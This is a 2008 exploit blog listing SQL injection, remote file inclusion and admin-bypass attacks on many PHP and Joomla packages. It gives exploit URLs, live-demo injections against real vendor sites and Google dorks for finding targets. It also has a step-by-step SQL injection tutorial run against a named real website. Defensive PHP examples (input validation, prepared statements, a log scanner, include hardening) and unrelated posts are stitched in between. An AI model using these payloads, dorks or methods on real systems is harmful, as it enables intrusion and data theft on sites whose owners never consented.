minimal-ablog 0.4 - Multiple Vuln  

Sunday, November 30, 2008

[o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln
Software : minimal-ablog version 0.4
Vendor : http://www.abweb.co.cc/
Download : http://code.google.com/p/minimal-ablog/downloads/list
Author : NoGe

[o] Vulnerable file
index.php
admin/uploader.php

[o] Exploit
[ SQL Injection ]
http://localhost/[path]/index.php?id=[SQL]
http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8-- <=- demo

[ File Upload ]
http://localhost/[path]/admin/uploader.php <=- upload your file here
http://localhost/[path]/img/[your_file] <=- the file will be uploaded here

[ Admin Bypass ]
when you open http://localhost/[path]/admin/uploader.php to upload a file, you already have admin privileges too :)
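Added here as an example, not minimal-ablog's own code: what a hardened admin/uploader.php would look like, addressing both problems the advisory lists, the missing admin check and the unrestricted write into img/. The session flag name (is_admin), the form field name (userfile) and the img/ location next to the script are assumptions; PHP 7 or later is assumed.

```php
<?php
// Added example (not minimal-ablog's code): hardened replacement for the
// upload handler pattern described above. Assumptions (not from the original):
// the admin login sets $_SESSION['is_admin'], the form field is "userfile",
// and uploads belong in an img/ directory beside this script.

declare(strict_types=1);

session_start();

// 1. Admin bypass fix: refuse to serve the uploader to anyone without an admin session.
function require_admin(): void
{
    if (empty($_SESSION['is_admin'])) {
        http_response_code(403);
        exit('admin login required');
    }
}

// 2. Upload validation: allowlist of image types and the extension each may carry.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and return the extension it should be stored under.
 * Returns null when the upload must be rejected.
 */
function validate_image_upload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] > 2 * 1024 * 1024) {          // 2 MiB cap; adjust to need
        return null;
    }
    // Detect the type from the bytes, never from the client-supplied name or MIME type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    return ALLOWED_TYPES[$mime] ?? null;
}

/**
 * Store the upload under a random, server-chosen name so the caller cannot pick
 * the path (no "../", no ".php"). Returns the stored file name.
 */
function store_upload(array $file, string $ext, string $dir): string
{
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($dest, 0644); // data, never executable
    return $name;
}

require_admin();

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['userfile'])) {
    $ext = validate_image_upload($_FILES['userfile']);
    if ($ext === null) {
        http_response_code(400);
        exit('rejected: only small JPEG/PNG/GIF images are accepted');
    }
    $stored = store_upload($_FILES['userfile'], $ext, __DIR__ . '/../img');
    echo 'stored as img/' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
}
```

The two halves are independent defences: the session check closes the admin bypass, and the type allowlist plus server-chosen file name mean that even an authenticated admin cannot place a script under img/. As a third layer, the web server should serve img/ with script execution disabled (under Apache mod_php, `php_admin_flag engine off` for that directory), so anything that slips through is still delivered as data.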



photoDiary 1.2 - SQL Injection Vuln  

Saturday, November 29, 2008

[o] photoDiary 1.2 SQL Injection Vulnerability
Software : photoDiary version 1.2
Vendor : http://webgriffe.com/
Download : http://code.google.com/p/photodiary/downloads/list
Author : NoGe

[o] Vulnerable file
admin/index.php
$act = $_GET['act'];
.....
if($act=="edit" || $act=="new"){
$id = $_GET['id'];

[o] Exploit
http://localhost/[path]/admin/index.php?act=edit&id=[SQL]

[o] Demo
http://photodiary.webgriffe.com/demo/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--

[o] Note
it's funny, because usually you do SQL injection to get the admin login, but in this one you must already have admin privileges to execute the SQL. lolz



PageTree CMS 0.0.2 BETA 0001 - RFI  

Friday, November 28, 2008

[o] PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability
Software : PageTree CMS version 0.0.2 BETA 0001
Vendor : http://pagetreecms.co.cc/
Download : http://pagetree.googlecode.com/svn/trunk/
Author : NoGe

[o] Vulnerable file
admin/plugins/Online_Users/main.php
include($GLOBALS['PT_Config']['dir']['data']."content/1.php");

[o] Exploit
http://localhost/[path]/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=[evilcode]



Pie Web M{a,e}sher 0.5.3 - Multiple RFI  

Tuesday, November 25, 2008

[o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability
Software : Pie Web M{a,e}sher version 0.5.3
Vendor : http://pie.ekkaia.org/
Download : http://pie.ekkaia.org/page/Download
Author : NoGe

[o] Vulnerable file
all files below are affected by the "lib" parameter
lib/action/alias.php
lib/action/cancel.php
lib/action/context.php
lib/action/deadlinks.php
lib/action/delete.php
lib/action/diff.php
lib/action/download.php
lib/action/dump.php
lib/action/edit.php
lib/action/fileimport.php
lib/action/fileinfo.php
lib/action/filelist.php
lib/action/goto.php
lib/action/history.php
lib/action/image.php
lib/action/latest.php
lib/action/links.php
lib/action/logflush.php
lib/action/login.php
lib/action/logout.php
lib/action/logshow.php
lib/action/maintenance.php
lib/action/page.php
lib/action/pageimport.php
lib/action/pageinfo.php
lib/action/pagelist.php
lib/action/password.php
lib/action/preview.php
lib/action/purge.php
lib/action/referers.php
lib/action/register.php
lib/action/rename.php
lib/action/revert.php
lib/action/rss.php
lib/action/search.php
lib/action/show.php
lib/action/source.php
lib/action/systeminfo.php
lib/action/update.php
lib/action/upgrade.php
lib/action/upload.php
lib/action/useradd.php
lib/action/userdel.php
lib/action/useredit.php
lib/action/userimport.php
lib/action/userinfo.php
lib/action/userlist.php
lib/action/version.php
lib/action/wipe.php

all files below are affected by the "GLOBALS[pie][library_path]" parameter
lib/class/diff.php
lib/class/file.php
lib/class/locale.php
lib/class/mapfile.php
lib/class/page.php
lib/class/user.php
lib/class/userpref.php
lib/compiler/html.php
lib/share/auth.php
lib/share/errorimage.php
lib/share/link.php
lib/share/log.php
lib/share/private.php
lib/share/referers.php

[o] Exploit
http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/compiler/html.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]



ZoGo-Shop e107 plugin 1.15.4 - SQL Injection Vuln  

Saturday, November 22, 2008

[o] ZoGo-Shop e107 plugins 1.15.4 SQL Injection Vulnerability
Software : ZoGo-Shop plugins version 1.15.4
Vendor : http://e107.org/
Download : http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.89
Author : NoGe

[o] Vulnerable file
e107_plugins/zogo-shop/product_details.php
$product_ID=$_GET["product"];

[o] Exploit
http://localhost/[path]/e107_plugins/zogo-shop/product_details.php?product=[SQL]

[o] Dork
"Powered by ZoGo-Shop" or "e107_plugins/zogo-shop/product_details.php"
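Added as an example, not the code of minimal-ablog, photoDiary, ZoGo-Shop or any other project on this page: the query pattern behind the "[SQL]" advisories above (a request value such as $_GET["product"] spliced straight into SQL text), shown in its vulnerable form and in a hardened form that validates the id and uses a prepared statement. The table and column names, the in-memory SQLite database used for the demo and PHP 7 or later are assumptions.

```php
<?php
// Added example (not the code of minimal-ablog, photoDiary or ZoGo-Shop): the
// vulnerable query pattern from the advisories on this page beside a hardened
// form. Table/column names and the SQLite demo database are assumed.

declare(strict_types=1);

// --- Vulnerable form: the request value is spliced into the SQL text, so a value
// like  -56 union select 1,2,version(),4--  becomes part of the statement. ---
function product_query_vulnerable(string $product): string
{
    return "SELECT id, name, price FROM products WHERE id=" . $product;
}

// --- Hardened form, part 1: validate the shape of the input. An id is a positive
// integer, so anything else is rejected before a database is even contacted. ---
function parse_product_id($raw): ?int
{
    // FILTER_VALIDATE_INT rejects "-56 union ...", "17 AND 1=1", "" and "17abc".
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// --- Hardened form, part 2: a prepared statement keeps data and SQL separate even
// if validation is ever loosened (the driver sends the value, not SQL text). ---
function fetch_product(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, name, price FROM products WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Request handling as a product_details.php would do it.
function handle_request(PDO $db, array $get): string
{
    $id = parse_product_id($get['product'] ?? null);
    if ($id === null) {
        http_response_code(400);
        return 'invalid product id';
    }
    $row = fetch_product($db, $id);
    if ($row === null) {
        http_response_code(404);
        return 'no such product';
    }
    return htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8');
}

// Stand-alone demo on an in-memory SQLite database with constructed sample data.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)');
$db->exec("INSERT INTO products VALUES (17, 'Widget', 9.99)");

echo handle_request($db, ['product' => '17']), "\n";
echo handle_request($db, ['product' => '-17 UNION SELECT 1,2,3/*']), "\n";
echo handle_request($db, ['product' => '17 AND 1=2']), "\n";
```

Validation alone would already stop the probes shown on this page, but the prepared statement is the fix that holds for parameters that are not integers (names, search strings), where an allowlist is not available; the same pattern applies to every `id=[SQL]`, `act=edit&id=[SQL]` and `pid=[SQL Query]` entry in these advisories.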



Jokes lolz  

Friday, November 21, 2008

A little boy lost contact with his mother in a shopping mall.
So he went up to a policeman and said:
"Please, could you help me find a lady who's here without a little boy who looks like me??"

:p



Detecting SQL Injection Vulnerabilities  

Monday, November 17, 2008

[x] What is SQL injection?

SQL injection is a technique for exploiting a database remotely.
Using SQL queries [SQL commands] we can find out the contents of the target's database.
More can be read here: http://en.wikipedia.org/wiki/SQL_injection
I'm tired of explaining it.. it's way too long. :)


[x] How do you detect SQL Injection on a site?

There are many ways to detect SQL Injection on a site.
One of them is to use the commands AND 1=1 and AND 1=2
AND 1=1 <=- TRUE condition
AND 1=2 <=- FALSE condition
There are still plenty of other ways to detect SQL Injection; in this tutorial I only use this one.
Let's go straight to an example target...
Google the keyword "product_details.php?product_id="
Targets will surely come out, right? Let's take the following one as an example.

http://www.ntlabs.co.uk/product_details.php?product_id=17

Now we'll try to detect SQL Injection on the target above using the commands from before.

[1] http://www.ntlabs.co.uk/product_details.php?product_id=17 AND 1=1
[2] http://www.ntlabs.co.uk/product_details.php?product_id=17 AND 1=2

What is the difference between the first URL and the second?
In the AND 1=1 [TRUE] condition the page does not change, whereas
in the AND 1=2 [FALSE] condition the page definitely changes, whether there is an error message or not.
This means the site can be exploited using SQL Injection.


[x] How do you find the number of TABLE in the database?

There are also many ways to find the number of TABLE in the target database; in this tutorial I use the ORDER BY command.
The number after the ORDER BY command is the number of TABLE; we start with the number 1.

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 1/*

After running it, the page doesn't change, i.e. the page is still in the TRUE condition, which means there are more than 1 TABLE.
Let's jump straight to 10 to be quick. :)

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 10/*

What happened? The page changed, i.e. the page is now in the FALSE condition, meaning there are no more than 10 TABLE.
So the TABLE range in the database is from 1 to 10.
Now we lower the number to 9.

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 9/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 8/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 7/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 6/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 5/*

Still FALSE, so we lower the number further until we get a TRUE condition.

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 4/*

At 4 the page returns to the TRUE condition. So we can conclude that there are 4 TABLE in the target database.
How do we know there are 4 TABLE? Because at 4 the page condition is TRUE while at 5 the page condition is already FALSE.
Don't believe it? Let's prove it using the UNION SELECT command.

[1] http://www.ntlabs.co.uk/product_details.php?product_id=17 UNION SELECT 1,2,3,4/*
[2] http://www.ntlabs.co.uk/product_details.php?product_id=17 UNION SELECT 1,2,3,4,5/*

Again, TRUE condition on the first URL and FALSE condition on the second.
Right? :p


[x] Magic number? [what the f*ck]

What is a magic number?
Magic numbers are the numbers that appear on the site's page; these numbers will be used to insert SQL queries [SQL commands].
How do you make the magic numbers appear?
By adding a - sign in front of the number that follows the variable; in this tutorial that is the number 17. [product_details.php?product_id=-17]

http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,2,3,4/*

Which numbers appear on the site's page?
Yup, the numbers 2, 3 and 4. So these are the numbers we will use to insert SQL queries [SQL commands].
For example, to see the database version we can use the version() function.

[1] http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,2,version(),4/*
[2] http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,database(),version(),user()/*

So the magic numbers that appeared earlier are replaced with SQL commands. Get it? xixixi...
That's roughly how to detect a SQL Injection Vulnerability on a site or in source.
Any questions? Post a comment or just google it!! :)
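Added here as an example, not part of the original tutorial: the defender's side of the walk-through above. The three steps (AND 1=1 / AND 1=2 pairs, the ORDER BY ladder, UNION SELECT with version()) leave a distinctive trail in web-server access logs, and this script scans constructed sample log lines for those patterns and groups hits by client IP and parameter. The log lines, IP addresses and host are invented for the example; PHP 7 or later is assumed. Note that what the ORDER BY n ladder actually counts is the number of columns in the original SELECT, which is why the UNION SELECT 1,2,3,4 check in the tutorial lines up with it.

```php
<?php
// Added example, not from the original tutorial: flag the SQL injection probing
// sequence the tutorial walks through when it appears in access logs. All log
// lines below are constructed sample data; nothing here is real traffic.

declare(strict_types=1);

// Each rule: a name and a case-insensitive regex applied to the decoded parameter value.
const SQLI_PROBE_RULES = [
    'boolean-pair'  => '/\bAND\s+1\s*=\s*[12]\b/i',
    'order-by-scan' => '/\bORDER\s+BY\s+\d+\s*(\/\*|--)?/i',
    'union-select'  => '/\bUNION\s+(ALL\s+)?SELECT\b/i',
    'fingerprint'   => '/\b(version|database|user)\s*\(\s*\)/i',
];

// Parse one common-log-format line into ip, path, status and decoded query parameters.
function parse_access_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+" (\d{3})/', $line, $m)) {
        return null;
    }
    $url   = parse_url($m[2]);
    $query = [];
    if (!empty($url['query'])) {
        parse_str($url['query'], $query);  // parse_str URL-decodes the values
    }
    return ['ip' => $m[1], 'path' => $url['path'] ?? '/', 'status' => (int)$m[3], 'query' => $query];
}

// Return every (rule, parameter) match found in one parsed request.
function classify_request(array $req): array
{
    $hits = [];
    foreach ($req['query'] as $param => $value) {
        if (!is_string($value)) {
            continue;
        }
        foreach (SQLI_PROBE_RULES as $rule => $regex) {
            if (preg_match($regex, $value)) {
                $hits[] = ['rule' => $rule, 'param' => (string)$param, 'value' => $value];
            }
        }
    }
    return $hits;
}

// Scan a whole log and summarise per (ip, path, parameter): flagged requests and rules seen.
function scan_log(array $lines): array
{
    $report = [];
    foreach ($lines as $line) {
        $req = parse_access_line($line);
        if ($req === null) {
            continue;
        }
        $perKey = [];
        foreach (classify_request($req) as $hit) {
            $perKey[$req['ip'] . ' ' . $req['path'] . '?' . $hit['param']][$hit['rule']] = true;
        }
        foreach ($perKey as $key => $rules) {
            $report[$key]['count'] = ($report[$key]['count'] ?? 0) + 1;
            foreach ($rules as $rule => $_) {
                $report[$key]['rules'][$rule] = true;
            }
        }
    }
    return $report;
}

// Constructed sample lines mirroring the tutorial's steps (IPs and timestamps made up).
$sample = [
    '198.51.100.7 - - [17/Nov/2008:10:01:02 +0700] "GET /product_details.php?product_id=17 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Nov/2008:10:01:09 +0700] "GET /product_details.php?product_id=17%20AND%201=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Nov/2008:10:01:15 +0700] "GET /product_details.php?product_id=17%20AND%201=2 HTTP/1.1" 200 1811',
    '198.51.100.7 - - [17/Nov/2008:10:02:01 +0700] "GET /product_details.php?product_id=17%20ORDER%20BY%2010/* HTTP/1.1" 200 1811',
    '198.51.100.7 - - [17/Nov/2008:10:02:40 +0700] "GET /product_details.php?product_id=17%20ORDER%20BY%204/* HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Nov/2008:10:03:20 +0700] "GET /product_details.php?product_id=-17%20UNION%20SELECT%201,2,version(),4/* HTTP/1.1" 200 5204',
    '203.0.113.9 - - [17/Nov/2008:10:03:21 +0700] "GET /product_details.php?product_id=18 HTTP/1.1" 200 5098',
];

foreach (scan_log($sample) as $key => $info) {
    printf("%s  flagged=%d  rules=%s\n", $key, $info['count'], implode(',', array_keys($info['rules'])));
}
```

On the sample above the first client is reported once, with five flagged requests and all four rules, while the second client (a plain product lookup) produces no line at all. Two things are worth keeping in mind when turning this into an alert: the HTTP status is 200 on every probe, so status-code monitoring sees nothing, and the response size is what actually distinguishes the TRUE and FALSE pages, so size swings on the same URL are a useful second signal. Pattern matching on parameters only catches probes that look like the tutorial's; the fix that removes the issue is parameterized queries in the application.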


[x] References

google.com
wikipedia.org
milw0rm.com
ReadMe Files
special greetz to k1tk4t



BBShop 4.5 Final - Multiple RFI  

Thursday, November 13, 2008

[o] BBShop 4.5 Final Multiple Remote File Inclusion Vulnerability
Software : BBShop version 4.5
Vendor : http://zzem.co.kr/
Developer : The Win
Author : NoGe

[o] Vulnerable file
bbshop/shop/index.php
bbshop/shop/main.php
bbshop/admin/admin.php
bbshop/admin/index.php
all these files are affected by the _shop_path variable

[o] Exploit
http://localhost/[path]/bbshop/shop/index.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/shop/main.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/admin.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/index.php?_shop_path=[evilcode]

[o] Dork
"bbshop"



Simple RSS Reader 1.0 - RFI  

Wednesday, November 12, 2008

[o] Simple RSS Reader Component 1.0 Remote File Inclusion Vulnerability
Software : com_rssreader version 1.0
Vendor : http://www.joomlashop.dk/
Download : http://extensions.joomlashop.dk/index.php?option=com_docman&task=cat_view&gid=16&Itemid=47
Author : NoGe

[o] Vulnerable file
administrator/components/com_rssreader/admin.rssreader.php
include( "$mosConfig_live_site/components/com_rssreader/about.html" );

[o] Exploit
http://localhost/[path]/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=[evilcode]



WEB-CMS - V-WIN.COM CMS - SQL Injection Vuln [private script]  

Tuesday, November 11, 2008

[o] WEB-CMS - V-WIN.COM CMS SQL Injection Vulnerability
Software : WEB-CMS - V-WIN.COM CMS [MALAYSIA WEBSITE CONTENT MANAGEMENT SYSTEM]
Vendor : http://www.v-win.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com

[o] Exploit
http://localhost/[path]/?page=pri&pid=[SQL Query]

[o] Live Demo
http://www.v-win.com/cms/?page=pri&pid=-131+union+select+1,2,3,database(),version(),6--

[o] Dork
"Concept, Designed, and Maintained by www.v-win.com"



Feederator [RSS manager] 1.0.5 - Multiple RFI  

Friday, November 7, 2008

[o] Feederator - RSS manager Component 1.0.5 Multiple Remote File Inclusion Vulnerabilities
Software : com_feederator version 1.0.5
Vendor : http://www.recly.com
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=2
Author : NoGe

[o] Vulnerable file
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );
administrator/components/com_feederator/includes/tmsp/edit_tmsp.php
require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );
administrator/components/com_feederator/includes/tmsp/subscription.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/GlobalVariables.class.php');
administrator/components/com_feederator/includes/tmsp/tmsp.php
require_once( $mosConfig_absolute_path . '/components/Recly/Recly_HTML/Recly_Paginator.class.php' );

[o] Exploit
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=[evilcode]



Clickheat [Heatmap stats for Joomla] 1.0.1 - Multiple RFI  

[o] Clickheat - Heatmap stats for Joomla! 1.0.1 Multiple Remote File Inclusion Vulnerabilities
Software : com_clickheat version 1.0.1
Vendor : http://www.recly.com
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1
Author : NoGe

[o] Vulnerable file
administrator/components/com_clickheat/install.clickheat.php
require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');
administrator/components/com_clickheat/includes/heatmap/_main.php
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
administrator/components/com_clickheat/includes/heatmap/main.php
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
administrator/components/com_clickheat/includes/overview/main.php
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );
administrator/components/com_clickheat/Recly/Clickheat/Cache.php
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
administrator/components/com_clickheat/Recly/common/GlobalVariables.php
require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');

[o] Exploit
http://localhost/[path]/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]



Recly!Competitions 1.0.0 - Multiple RFI  

[o] Recly!Competitions Joomla Component 1.0.0 Multiple Remote File Inclusion Vulnerabilities
Software : com_competitions version 1.0.0
Vendor : http://www.recly.com
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=12
Author : NoGe

[o] Vulnerable file
administrator/components/com_competitions/includes/competitions/add.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/components/com_competitions/lib/common/GlobalVariables.class.php');
administrator/components/com_competitions/includes/competitions/competitions.php
require_once( $GLOBALS['mosConfig_absolute_path'] . '/administrator/includes/pageNavigation.php' );
administrator/components/com_competitions/includes/settings/settings.php
require_once($mosConfig_absolute_path.'/components/com_competitions/lib/common/String.class.php');

[o] Exploit
http://localhost/[path]/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=[evilcode]



Dada Mail Manager 2.6 - RFI  

Thursday, November 6, 2008

[o] Dada Mail Manager Joomla Component 2.6 Remote File Inclusion Vulnerability
Software : com_dadamail version 2.6
Vendor : http://joomlander.net
Download : http://joomlacode.org/gf/project/dadamailmanager/frs
Author : NoGe

[o] Vulnerable file
administrator/components/com_dadamail/config.dadamail.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');

[o] Exploit
http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=[evilcode]



Virtuemart Google Base Component 1.1 - RFI  

Tuesday, November 4, 2008

[o] Virtuemart Google Base Component 1.1 Remote File Inclusion Vulnerability
Software : com_googlebase version 1.1
Vendor : http://www.joomlahacks.com/
Author : NoGe

[o] Vulnerable file
administrator/components/com_googlebase/admin.googlebase.php
include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );

[o] Exploit
http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode]



Onguma TimeSheet 4 Beta - RFI  

[o] Onguma TimeSheet 4 Beta Remote File Inclusion Vulnerability
Software : com_ongumatimesheet20 version 4 Beta
Download : http://joomlacode.org/gf/project/ongumasa/frs/
Author : NoGe

[o] Vulnerable file
administrator/components/com_ongumatimesheet20/lib/onguma.class.php
include_once($mosConfig_absolute_path.'/includes/patTemplate/patError.php');
include_once($mosConfig_absolute_path.'/includes/patTemplate/patErrorManager.php');
include_once($mosConfig_absolute_path.'/includes/patTemplate/patTemplate.php');

[o] Exploit
http://localhost/[path]/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=[evilcode]



The Dangers of Caffeine  

Sunday, November 2, 2008

Caffeine is a chemical substance belonging to the alkaloid group. Caffeine comes from plants and can stimulate the brain and nerves. So what is the effect of caffeine when it is consumed?
Besides coffee, caffeine is found in tea, cola, chocolate, energy drinks and medicines. A cup of coffee contains about 80-125 mg of caffeine, while a can of cola soft drink contains about 23-37 mg, tea about 40 mg, and one ounce of chocolate about 20 mg. So far, no scientific research has stated that consuming caffeine at normal levels endangers health. However, excessive caffeine consumption can cause various problems, such as teeth turning brown or dark, bad breath, increased stress, heart attacks, male infertility, digestive disorders, addiction, and even premature aging. Caffeine is also one of the main causes of headaches. Several studies mention that drinking too much coffee in the morning can raise blood pressure and stress levels and trigger the production of stress hormones.


Good thing /me doesn't smoke. :)



Flash Tree Gallery 1.0 - RFI  

[o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability
Software : com_treeg version 1.0
Vendor : http://justjoomla.net/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com

[o] Vulnerable file
administrator/components/com_treeg/admin.treeg.php
include( "$mosConfig_live_site/components/com_treeg/about.html" );

[o] Exploit
http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]
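Added as an example, not code from PageTree CMS, Pie Web M{a,e}sher, BBShop or any of the Joomla components listed on this page: the include pattern that all of the RFI advisories above share (a path variable such as $mosConfig_absolute_path, $mosConfig_live_site, _shop_path or a GLOBALS[...] entry that register_globals lets the request set) beside a hardened replacement that derives the base directory server-side, resolves any variable file name with realpath and refuses anything that leaves the application root or names a stream wrapper. The component and plugin names and PHP 7 or later are assumptions.

```php
<?php
// Added example (not the code of any project on this page): the remote file
// inclusion pattern from the advisories above and a hardened replacement.
// Component/plugin names are assumed for the example.

declare(strict_types=1);

// --- Vulnerable form (as the advisories describe it): with register_globals=On,
// ?mosConfig_absolute_path=[remote URL] makes include() fetch and run remote code
// whenever allow_url_include permits it. ---
function load_config_vulnerable(): void
{
    global $mosConfig_absolute_path;  // may have been populated from the query string
    include($mosConfig_absolute_path . '/administrator/components/com_example/config.php');
}

// --- Hardened form, part 1: the base directory is a server-side constant derived
// from this file's own location, so no request value can take part in it. ---
define('APP_ROOT', realpath(__DIR__));

// --- Hardened form, part 2: when a file name really is variable (e.g. a plugin
// chosen by the request), resolve it and require that it stays inside $root and
// is a plain local file, never a wrapper such as http:// or php://. ---
function resolve_local_include(string $root, string $relative): ?string
{
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $relative)) {
        return null;                         // URL or wrapper scheme: refuse
    }
    $candidate = realpath($root . '/' . $relative);
    if ($candidate === false || !is_file($candidate)) {
        return null;                         // missing file (or "../" escaped somewhere)
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                         // resolved outside the application root
    }
    return $candidate;
}

// Allowlist the plugin names the application ships, then include the resolved path.
function load_plugin(string $name): bool
{
    $known = ['Online_Users', 'Search'];     // assumed plugin set for the example
    if (!in_array($name, $known, true)) {
        return false;
    }
    $path = resolve_local_include(APP_ROOT, "admin/plugins/$name/main.php");
    if ($path === null) {
        return false;
    }
    require_once $path;
    return true;
}

// --- Configuration check: the directives that turn this bug class into remote
// code execution. register_globals was removed in PHP 5.4; on older builds it
// must be Off, and allow_url_include should be Off everywhere. ---
function risky_include_settings(): array
{
    $bad = [];
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        $bad[] = 'allow_url_include=On';
    }
    if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
        $bad[] = 'register_globals=On';
    }
    return $bad;
}

foreach (risky_include_settings() as $warning) {
    fwrite(STDERR, "WARNING: $warning\n");
}
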